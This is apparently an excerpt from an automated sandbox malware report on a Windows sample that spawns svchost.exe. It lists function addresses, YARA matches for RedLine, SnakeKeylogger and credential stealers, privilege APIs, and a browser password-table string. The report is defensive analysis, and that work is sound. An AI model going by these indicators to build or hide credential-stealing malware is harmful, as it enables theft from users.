              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07866EA82_2_07866EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786EEE02_2_0786EEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786CC5F2_2_0786CC5F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786C9872_2_0786C987
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_078658872_2_07865887
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786EED02_2_0786EED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0786FBA82_2_0786FBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090495782_2_09049578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090425802_2_09042580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090450482_2_09045048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09049C482_2_09049C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09040B302_2_09040B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090417B02_2_090417B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09041E982_2_09041E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D1192_2_0904D119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D1282_2_0904D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D5702_2_0904D570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090425722_2_09042572
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D5802_2_0904D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D9C82_2_0904D9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904D9D82_2_0904D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090400062_2_09040006
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904F8322_2_0904F832
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090450382_2_09045038
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090400402_2_09040040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904F8402_2_0904F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904FC982_2_0904FC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904CCC02_2_0904CCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904CCD02_2_0904CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904EB292_2_0904EB29
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09040B2B2_2_09040B2B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904EB382_2_0904EB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090493582_2_09049358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904EF802_2_0904EF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904EF902_2_0904EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904179F2_2_0904179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09048BB12_2_09048BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09048BC02_2_09048BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904F3D72_2_0904F3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904F3E82_2_0904F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904DE1F2_2_0904DE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904DE302_2_0904DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904E27A2_2_0904E27A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904E2882_2_0904E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09041E8A2_2_09041E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904E6D02_2_0904E6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0904E6E02_2_0904E6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 44 times
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: String function: 00628900 appears 42 times
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: String function: 00620AE3 appears 70 times
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: String function: 00607DE1 appears 35 times
              Source: lsc5QN46NH.exe, 00000000.00000003.1513701856.000000000407D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lsc5QN46NH.exe
              Source: lsc5QN46NH.exe, 00000000.00000003.1514489770.0000000003ED3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lsc5QN46NH.exe
              Source: lsc5QN46NH.exe, 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs lsc5QN46NH.exe
              Source: lsc5QN46NH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.lsc5QN46NH.exe.21a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066A06A GetLastError,FormatMessageW,0_2_0066A06A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006581CB AdjustTokenPrivileges,CloseHandle,0_2_006581CB
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006587E1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0066B333
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0067EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0067EE0D
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_006783BB
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00604E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00604E89
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeFile created: C:\Users\user\AppData\Local\Temp\aut8912.tmpJump to behavior
              Source: lsc5QN46NH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000002.00000002.3934335927.00000000055B0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703350152.0000000006457000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3934335927.00000000055BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: lsc5QN46NH.exeVirustotal: Detection: 31%
              Source: lsc5QN46NH.exeReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Users\user\Desktop\lsc5QN46NH.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"Jump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: iphlpapi.dllJump to behavior
